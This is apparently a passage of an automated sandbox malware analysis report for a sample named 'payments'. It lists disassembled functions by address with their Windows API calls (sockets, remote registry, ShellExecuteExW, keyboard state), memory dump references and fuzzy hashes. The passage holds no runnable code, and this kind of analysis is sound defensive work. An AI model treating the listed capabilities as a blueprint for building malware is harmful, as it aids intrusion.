                                                                                                                          • Opcode Fuzzy Hash: ae166102cf28a538e56d390aa638ba51fc178f6e4ff45b1b892ca56e778f09b6
                                                                                                                          • Instruction Fuzzy Hash: B2C18B75A0021A9FDB00DF98C495BAEB7F5EF09315F20806AE619E7381D734AA41DF91
                                                                                                                          Function 00CD6B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CD6B63
                                                                                                                          • LoadStringW.USER32(00000000), ref: 00CD6B6A
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CD6B80
                                                                                                                          • LoadStringW.USER32(00000000), ref: 00CD6B87
                                                                                                                          • _wprintf.LIBCMT ref: 00CD6BAD
                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CD6BCB
                                                                                                                          Strings
                                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00CD6BA8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                          • API String ID: 3648134473-3128320259
                                                                                                                          • Opcode ID: 1843f054c754ea11e459cf77a6599c29427d122ec768a60fa83f417f52cbd099
                                                                                                                          • Instruction ID: af055aa6d445836ce138fc0ed964bac84f0f87c94ddfec1a510fd1d51129f54e
                                                                                                                          • Opcode Fuzzy Hash: 1843f054c754ea11e459cf77a6599c29427d122ec768a60fa83f417f52cbd099
                                                                                                                          • Instruction Fuzzy Hash: C10112F65403587FE711ABA49D89EF6766DD708304F008492B746D2141EA749E859F70
                                                                                                                          Function 00CF2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CF3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2BB5,?,?), ref: 00CF3C1D
                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF2BF6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BuffCharConnectRegistryUpper
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2595220575-0
                                                                                                                          • Opcode ID: e0743381451ef380a42abe3c50fe65114820266ae892736dfa7068b52a4cb929
                                                                                                                          • Instruction ID: ac7b3658447491775b06f604aeea460209c6ffd8eff56ce139cb239f8c53f40c
                                                                                                                          • Opcode Fuzzy Hash: e0743381451ef380a42abe3c50fe65114820266ae892736dfa7068b52a4cb929
                                                                                                                          • Instruction Fuzzy Hash: B1918C71204205AFDB10EF58C895BBEB7E5FF88314F04881DFA96972A1DB34EA05DB42
                                                                                                                          Function 00CE95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • select.WSOCK32 ref: 00CE9691
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE969E
                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00CE96C8
                                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CE96E9
                                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00CE96F8
                                                                                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 00CE97AA
                                                                                                                          • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00D2DC00), ref: 00CE9765
                                                                                                                            • Part of subcall function 00CCD2FF: _strlen.LIBCMT ref: 00CCD309
                                                                                                                          • _strlen.LIBCMT ref: 00CE9800
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3480843537-0
                                                                                                                          • Opcode ID: 2c2768879d4c2a70288bd5b515855aa74bf7df182dd6f6bd31b621ad76082fd7
                                                                                                                          • Instruction ID: 31757f9525551988bfd2877a637e2233866705ff26ab34579e13cbbe59cf6923
                                                                                                                          • Opcode Fuzzy Hash: 2c2768879d4c2a70288bd5b515855aa74bf7df182dd6f6bd31b621ad76082fd7
                                                                                                                          • Instruction Fuzzy Hash: 4481F071504240ABC720EFA5CC85E6BB7E9EF85714F10461DF5569B2E1EB30DD04DBA2
                                                                                                                          Function 00CBA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __mtinitlocknum.LIBCMT ref: 00CBA991
                                                                                                                            • Part of subcall function 00CB7D7C: __FF_MSGBANNER.LIBCMT ref: 00CB7D91
                                                                                                                            • Part of subcall function 00CB7D7C: __NMSG_WRITE.LIBCMT ref: 00CB7D98
                                                                                                                            • Part of subcall function 00CB7D7C: __malloc_crt.LIBCMT ref: 00CB7DB8
                                                                                                                          • __lock.LIBCMT ref: 00CBA9A4
                                                                                                                          • __lock.LIBCMT ref: 00CBA9F0
                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00D46DE0,00000018,00CC5E7B,?,00000000,00000109), ref: 00CBAA0C
                                                                                                                          • EnterCriticalSection.KERNEL32(8000000C,00D46DE0,00000018,00CC5E7B,?,00000000,00000109), ref: 00CBAA29
                                                                                                                          • LeaveCriticalSection.KERNEL32(8000000C), ref: 00CBAA39
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1422805418-0
                                                                                                                          • Opcode ID: f810a32adc57c66ca31cb002d5b775da3fbce22f206e9f8d6e413af517a27daa
                                                                                                                          • Instruction ID: 5e284559afc936a479de2a1c09e672bd7e4fe57468c1ca495335cf6cce1bb167
                                                                                                                          • Opcode Fuzzy Hash: f810a32adc57c66ca31cb002d5b775da3fbce22f206e9f8d6e413af517a27daa
                                                                                                                          • Instruction Fuzzy Hash: 1F4126719003019BEB109F68CA447D8BBA0BF05325F148318E8B5EB2D1DB749941EFA2
                                                                                                                          Function 00CE16DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                            • Part of subcall function 00CAC6F4: _wcscpy.LIBCMT ref: 00CAC717
                                                                                                                          • _wcstok.LIBCMT ref: 00CE184E
                                                                                                                          • _wcscpy.LIBCMT ref: 00CE18DD
                                                                                                                          • _memset.LIBCMT ref: 00CE1910
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                          • String ID: X
                                                                                                                          • API String ID: 774024439-3081909835
                                                                                                                          • Opcode ID: 4a109dd27b5fcd89c980d5123360b39cbef1a61a62dc2bc62fbb8c172bd38b24
                                                                                                                          • Instruction ID: 6417c012f97b4a582f8057ad91d2bfebfe7d9c7542ad154d1aaff95038d1b0c6
                                                                                                                          • Opcode Fuzzy Hash: 4a109dd27b5fcd89c980d5123360b39cbef1a61a62dc2bc62fbb8c172bd38b24
                                                                                                                          • Instruction Fuzzy Hash: 60C19F316043409FCB24EF64C895AAEB7E4FF85350F04496DF89A972A2DB30ED55DB82
                                                                                                                          Function 00CAAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8160143695c1f91c0fd63addc77ef6a16781a2627daf5e9827582e6a5b5246d0
                                                                                                                          • Instruction ID: 16938914aaca5eecd3a3b6bda172d0922eb706ac4448852084d62072263f6a8b
                                                                                                                          • Opcode Fuzzy Hash: 8160143695c1f91c0fd63addc77ef6a16781a2627daf5e9827582e6a5b5246d0
                                                                                                                          • Instruction Fuzzy Hash: 9F718EB090010AFFCB08CF99CC49AAEBB75FF8A314F148149F915A7251D730AA52CF65
                                                                                                                          Function 00CF2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CF225A
                                                                                                                          • _memset.LIBCMT ref: 00CF2323
                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00CF2368
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                            • Part of subcall function 00CAC6F4: _wcscpy.LIBCMT ref: 00CAC717
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CF242F
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00CF243E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 4082843840-2766056989
                                                                                                                          • Opcode ID: 2669f5b2f1bd58f0bd20c17988e199647783c1fd2f0ab41b8d5cd1f3d1b16fb2
                                                                                                                          • Instruction ID: aa3d02117d59fbde91f1d8a257731917fa6f2aae941a8ff6fed757d6a0207ef6
                                                                                                                          • Opcode Fuzzy Hash: 2669f5b2f1bd58f0bd20c17988e199647783c1fd2f0ab41b8d5cd1f3d1b16fb2
                                                                                                                          • Instruction Fuzzy Hash: 1A71A1B0A00619DFCF05EFA8C4859AEBBF5FF48310F108459E955AB3A1CB34AE41DB91
                                                                                                                          Function 00CFE062 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CFE1D5
                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CFE20D
                                                                                                                          • IsDlgButtonChecked.USER32(?,00000001), ref: 00CFE248
                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00CFE269
                                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CFE281
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3188977179-2594219639
                                                                                                                          • Opcode ID: 142c20f0169608faed13a2d80906c9614471eb20cc2ef8b2f135c77ebe49856c
                                                                                                                          • Instruction ID: daedcced043bff7f07c06ba1ba04b17b4e0fcabd50c79bcddcf770467761863e
                                                                                                                          • Opcode Fuzzy Hash: 142c20f0169608faed13a2d80906c9614471eb20cc2ef8b2f135c77ebe49856c
                                                                                                                          • Instruction Fuzzy Hash: D9617F38600208AFDB65DF59C855FBE77BAEF49300F148059FA65973B2C771AA40DB12
                                                                                                                          Function 00CD3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 00CD3DE7
                                                                                                                          • GetKeyboardState.USER32(?), ref: 00CD3DFC
                                                                                                                          • SetKeyboardState.USER32(?), ref: 00CD3E5D
                                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CD3E8B
                                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CD3EAA
                                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CD3EF0
                                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CD3F13
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 87235514-0
                                                                                                                          • Opcode ID: b763b1e1b9e926bb9374f446380039a456253a7a9b1bb301b85d0b374bc0cdf9
                                                                                                                          • Instruction ID: eb8b94980e349d5e73cba3ceb80001c2623c0828e834dddedcf91910e2c0ff22
                                                                                                                          • Opcode Fuzzy Hash: b763b1e1b9e926bb9374f446380039a456253a7a9b1bb301b85d0b374bc0cdf9
                                                                                                                          • Instruction Fuzzy Hash: 1A51E5A06047D53DFB3647648C45BBABFA55B06304F08858AE2E586AC2D3A49FC4D762
                                                                                                                          Function 00CD3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(00000000), ref: 00CD3C02
                                                                                                                          • GetKeyboardState.USER32(?), ref: 00CD3C17
                                                                                                                          • SetKeyboardState.USER32(?), ref: 00CD3C78
                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CD3CA4
                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CD3CC1
                                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CD3D05
                                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CD3D26
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 87235514-0
                                                                                                                          • Opcode ID: 52507b0890ee89139be7b2e377e74a8353c92f9302e62ba0780cf9db54d40b76
                                                                                                                          • Instruction ID: 1697434bc00a1c4090f6f27d0bc46b76ca4fa11a66fc7766decdb3ccd3d6cd01
                                                                                                                          • Opcode Fuzzy Hash: 52507b0890ee89139be7b2e377e74a8353c92f9302e62ba0780cf9db54d40b76
                                                                                                                          • Instruction Fuzzy Hash: 5B516DA05147D53DFB3243348C45BBABF9A5B46300F0C858BE2E5566C2D394EF84EB62
                                                                                                                          Function 00CFCCF7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 0-2594219639
                                                                                                                          • Opcode ID: e1955e6aabf7812b0d0fe94fc6e31f79fed308751fa8e58e8a5cfe64a5885338
                                                                                                                          • Instruction ID: 7a0fdff41792a6c962b20705d2f5308d6f4dbfbc11d9ed9cff79be81ef5a8781
                                                                                                                          • Opcode Fuzzy Hash: e1955e6aabf7812b0d0fe94fc6e31f79fed308751fa8e58e8a5cfe64a5885338
                                                                                                                          • Instruction Fuzzy Hash: 3741C339A0021CBBCB54DF68CDC4FB9BB69EB09310F154125EA69E72D1C730AE11DA61
                                                                                                                          Function 00CD08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD08F2
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD0918
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00CD091B
                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00CD0939
                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00CD0942
                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00CD0967
                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00CD0975
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3761583154-0
                                                                                                                          • Opcode ID: 9097556d55493c2bce48809fca296c81845d516e9d01537267d8ccda0ca190c1
                                                                                                                          • Instruction ID: ecebdcfe245b1ec17434abe8429629d1f17ccbf00606573145f6de743cfb8764
                                                                                                                          • Opcode Fuzzy Hash: 9097556d55493c2bce48809fca296c81845d516e9d01537267d8ccda0ca190c1
                                                                                                                          • Instruction Fuzzy Hash: 24217476601219BF9B109BACDC84EEB73ACEB09360B108126FA15DB355DA70ED46C764
                                                                                                                          Function 00CCB80A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 93windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CCB88E
                                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CCB8A1
                                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CCB8D1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: @U=u$ComboBox$ListBox
                                                                                                                          • API String ID: 3850602802-2258501812
                                                                                                                          • Opcode ID: cde2fc5d934d7880b600403100c572bbe1158174f209c39449bcbf4a34a352f2
                                                                                                                          • Instruction ID: db00bd9877d9a7d962572c9978e6623eb817952fc12670b54a123c620a1265df
                                                                                                                          • Opcode Fuzzy Hash: cde2fc5d934d7880b600403100c572bbe1158174f209c39449bcbf4a34a352f2
                                                                                                                          • Instruction Fuzzy Hash: F521BF76900208BFDB04ABA4D88BEFEB77DDF45354F10412DF422A61E1DB744E0AAB60
                                                                                                                          Function 00CD2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
